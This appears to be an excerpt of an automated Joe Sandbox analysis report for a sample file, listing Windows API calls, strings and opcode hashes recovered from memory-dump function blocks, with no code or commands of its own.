                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2347767575-0
                                                                                                                • Opcode ID: 4c1a439ddd92f9517d20788327e052f5c567b1d9931566a507f0c727a144b7b8
                                                                                                                • Instruction ID: f4d61fe8edf4b3583e353df04899b8e330400ae9ad45954680c8f03d964c2d2b
                                                                                                                • Opcode Fuzzy Hash: 4c1a439ddd92f9517d20788327e052f5c567b1d9931566a507f0c727a144b7b8
                                                                                                                • Instruction Fuzzy Hash: C8514BB5900209AFDF10DF91DD49EEEBB79FF08308F04811EE911A6290EB39DA15DB65
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 2889450990-2391861430
                                                                                                                • Opcode ID: e80d6eac3e90a93a195586fe0a079328e01d2b7210707948af18d145c227188c
                                                                                                                • Instruction ID: 5803db237ebe54f367a8b71ed4ca33db6f2c5d7a2bc604407dbd7744506c69d6
                                                                                                                • Opcode Fuzzy Hash: e80d6eac3e90a93a195586fe0a079328e01d2b7210707948af18d145c227188c
                                                                                                                • Instruction Fuzzy Hash: F2518471800109BACF15EBE1DD96EEEBB79AF14308F10016BF505721A1EB386F59DB64
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 2889450990-3420473620
                                                                                                                • Opcode ID: b81337722e7359545e281cd753f9e37098ac602bf60cd7472601723586c09f9d
                                                                                                                • Instruction ID: b17fd6ddef5e08795a6038874805444b40b0a2498f15689853562e37c6fa4f27
                                                                                                                • Opcode Fuzzy Hash: b81337722e7359545e281cd753f9e37098ac602bf60cd7472601723586c09f9d
                                                                                                                • Instruction Fuzzy Hash: A951A531900109BACF15EBE1DD96EEEBB78AF14308F10006BF105721A2EB786F59DB65
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004D55D7
                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 004D5664
                                                                                                                • GetMenuItemCount.USER32(00551708), ref: 004D56ED
                                                                                                                • DeleteMenu.USER32(00551708,00000005,00000000,000000F5,?,?), ref: 004D577D
                                                                                                                • DeleteMenu.USER32(00551708,00000004,00000000), ref: 004D5785
                                                                                                                • DeleteMenu.USER32(00551708,00000006,00000000), ref: 004D578D
                                                                                                                • DeleteMenu.USER32(00551708,00000003,00000000), ref: 004D5795
                                                                                                                • GetMenuItemCount.USER32(00551708), ref: 004D579D
                                                                                                                • SetMenuItemInfoW.USER32(00551708,00000004,00000000,00000030), ref: 004D57D3
                                                                                                                • GetCursorPos.USER32(?), ref: 004D57DD
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 004D57E6
                                                                                                                • TrackPopupMenuEx.USER32(00551708,00000000,?,00000000,00000000,00000000), ref: 004D57F9
                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004D5805
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3993528054-0
                                                                                                                • Opcode ID: 001096385cbb050c2a255d07eda551bf2b41bdd7497b7f2e3bdc3cde269b2880
                                                                                                                • Instruction ID: c270481e63fb66ceef1321b8cae53dd792d69f53155b7e8782d171eacc4dabec
                                                                                                                • Opcode Fuzzy Hash: 001096385cbb050c2a255d07eda551bf2b41bdd7497b7f2e3bdc3cde269b2880
                                                                                                                • Instruction Fuzzy Hash: A5710630640A15BFEB209B15DC59FAABFA5FF41368F244207F5186A3D0CB789C10DB69
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004CA1DC
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004CA211
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004CA22D
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004CA249
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004CA273
                                                                                                                • CLSIDFromString.COMBASE(?,?), ref: 004CA29B
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004CA2A6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004CA2AB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 1687751970-22481851
                                                                                                                • Opcode ID: f67856bb70f7723c80156fcb3cdd88568a1c8a2675f10fe61717caf13570edf3
                                                                                                                • Instruction ID: 12155f43b0065bf9600cb011b93bf66c682654eb4596aa052007ac1c977d01eb
                                                                                                                • Opcode Fuzzy Hash: f67856bb70f7723c80156fcb3cdd88568a1c8a2675f10fe61717caf13570edf3
                                                                                                                • Instruction Fuzzy Hash: 7E410A76C1022DAACF11EBA5DC95DEEBB78FF14308F00406AF901A3260EB349E15DB54
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                • API String ID: 3964851224-909552448
                                                                                                                • Opcode ID: b8d9c217f9ff31a26162d8c4d55ef1f074effa1ab09661b9640617a2a2790d5f
                                                                                                                • Instruction ID: 832405336ea7968e7fe5f3677ecc625c23557be6fee58f96c81ed47b71ace6a3
                                                                                                                • Opcode Fuzzy Hash: b8d9c217f9ff31a26162d8c4d55ef1f074effa1ab09661b9640617a2a2790d5f
                                                                                                                • Instruction Fuzzy Hash: 3E41403015028E8BDF04EF11D851AFB3765BF62359F10442AED651B296EB78AE0ACF58
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005036F4,00000010,?,Bad directive syntax error,0052DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004D25D6
                                                                                                                • LoadStringW.USER32(00000000,?,005036F4,00000010), ref: 004D25DD
                                                                                                                • _wprintf.LIBCMT ref: 004D2610
                                                                                                                • __swprintf.LIBCMT ref: 004D2632
                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004D26A1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                • API String ID: 1080873982-4153970271
                                                                                                                • Opcode ID: 7424e88c9034b0cfb5d568f7402ecbb1847938f14820e4f84bd444a0b04ae2d1
                                                                                                                • Instruction ID: 11f3e7ea383f35417d081b55f13cabfa3b429b0f16c49a32f7adae783b50842a
                                                                                                                • Opcode Fuzzy Hash: 7424e88c9034b0cfb5d568f7402ecbb1847938f14820e4f84bd444a0b04ae2d1
                                                                                                                • Instruction Fuzzy Hash: 4A218531800319BFCF11AF91CC5AEEE7B35BF18308F00446AF505621A2EB75A619DB64
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004D7B42
                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004D7B58
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004D7B69
                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004D7B7B
                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004D7B8C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString
                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                • API String ID: 890592661-1007645807
                                                                                                                • Opcode ID: a49222e71f7d3a2928f52fe2f16a06761d1d2d4249ac9073c16919d656bf8533
                                                                                                                • Instruction ID: 85d3a3c90320d9bf0ffb81a31b3e32dbb1aa7f2c82bc1687eb8a2d73e2a24204
                                                                                                                • Opcode Fuzzy Hash: a49222e71f7d3a2928f52fe2f16a06761d1d2d4249ac9073c16919d656bf8533
                                                                                                                • Instruction Fuzzy Hash: 6E11C4B1A8025979DB20B3A2CC9ADFF7E7CEB91B18F00042F7451A31D1EA681B45C6B4
                                                                                                                APIs
                                                                                                                • timeGetTime.WINMM ref: 004D7794
                                                                                                                  • Part of subcall function 004ADC38: timeGetTime.WINMM(?,75A4B400,005058AB), ref: 004ADC3C
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 004D77C0
                                                                                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004D77E4
                                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 004D7806
                                                                                                                • SetActiveWindow.USER32 ref: 004D7825
                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004D7833
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004D7852
                                                                                                                • Sleep.KERNEL32(000000FA), ref: 004D785D
                                                                                                                • IsWindow.USER32 ref: 004D7869
                                                                                                                • EndDialog.USER32(00000000), ref: 004D787A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                • String ID: BUTTON
                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                • Opcode ID: 1c4eef715ce5ed5c20fd0ef1d7b7daeb641c36428ea8a7002e035400b13ffc7f
                                                                                                                • Instruction ID: aea482b96522367e60efedaf188357aa5bf142e86277e78eeac41b8235d28bcb
                                                                                                                • Opcode Fuzzy Hash: 1c4eef715ce5ed5c20fd0ef1d7b7daeb641c36428ea8a7002e035400b13ffc7f
                                                                                                                • Instruction Fuzzy Hash: 11216274204305AFE7016B20ECADB663F39FB24389F41445BF50982361EB79AD08FA29
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                • CoInitialize.OLE32(00000000), ref: 004E034B
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004E03DE
                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 004E03F2
                                                                                                                • CoCreateInstance.COMBASE(0051DA8C,00000000,00000001,00543CF8,?), ref: 004E043E
                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004E04AD
                                                                                                                • CoTaskMemFree.COMBASE(?), ref: 004E0505
                                                                                                                • _memset.LIBCMT ref: 004E0542
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004E057E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004E05A1
                                                                                                                • CoTaskMemFree.COMBASE(00000000), ref: 004E05A8
                                                                                                                • CoTaskMemFree.COMBASE(00000000), ref: 004E05DF
                                                                                                                • CoUninitialize.COMBASE ref: 004E05E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1246142700-0
                                                                                                                • Opcode ID: b535755bf193c47ed2b205107c2ffd5753dd42934adf48c7464bad8982b42db5
                                                                                                                • Instruction ID: f6ef029d8e8f33b26f9471d1c2f979d9ea4b6b314853d3698e3c3e38427cdb28
                                                                                                                • Opcode Fuzzy Hash: b535755bf193c47ed2b205107c2ffd5753dd42934adf48c7464bad8982b42db5
                                                                                                                • Instruction Fuzzy Hash: 56B10B74A00109AFDB04DFA5C888DAEBBB9FF48305B1484AAF815EB251DB74ED45CF54
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 004D2ED6
                                                                                                                • SetKeyboardState.USER32(?), ref: 004D2F41
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 004D2F61
                                                                                                                • GetKeyState.USER32(000000A0), ref: 004D2F78
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004D2FA7
                                                                                                                • GetKeyState.USER32(000000A1), ref: 004D2FB8
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004D2FE4
                                                                                                                • GetKeyState.USER32(00000011), ref: 004D2FF2
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 004D301B
                                                                                                                • GetKeyState.USER32(00000012), ref: 004D3029
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 004D3052
                                                                                                                • GetKeyState.USER32(0000005B), ref: 004D3060
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: 1889ae6cecbc54545296c5f301b391e81c6fcbba906e9bbe25c4fdfd60000dca
                                                                                                                • Instruction ID: bf3838666966fd6f8db2177efb0abcf28c7a776f6960cee3843a9c2f3a058047
                                                                                                                • Opcode Fuzzy Hash: 1889ae6cecbc54545296c5f301b391e81c6fcbba906e9bbe25c4fdfd60000dca
                                                                                                                • Instruction Fuzzy Hash: 2451B76060479429FB35DBA489207EBBBB45F21344F08859FD5C2563C2DA9C9B8CC76A
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004CED1E
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004CED30
                                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004CED8E
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004CED99
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004CEDAB
                                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004CEE01
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004CEE0F
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004CEE20
                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004CEE63
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004CEE71
                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004CEE8E
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004CEE9B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3096461208-0
                                                                                                                • Opcode ID: 986eca1622ad0efe2edb79bb4c4662c4b0e166ef4e69ac12485d134a3bcfd580
                                                                                                                • Instruction ID: a89d911045845164c5ffd0e4a118d6d5c8120afba2a879b5dcb0a7c731bc00b1
                                                                                                                • Opcode Fuzzy Hash: 986eca1622ad0efe2edb79bb4c4662c4b0e166ef4e69ac12485d134a3bcfd580
                                                                                                                • Instruction Fuzzy Hash: A8512EB5B00205AFDB18CFA9DD85FAEBBBAEB98300F14812DF51AD7290D7749D448B14
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004AB438
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 259745315-0
                                                                                                                • Opcode ID: 5d69716f1cc4c901ec2b65067e48e22f7f5c51bce25e8d28ce1ae8bf758f548d
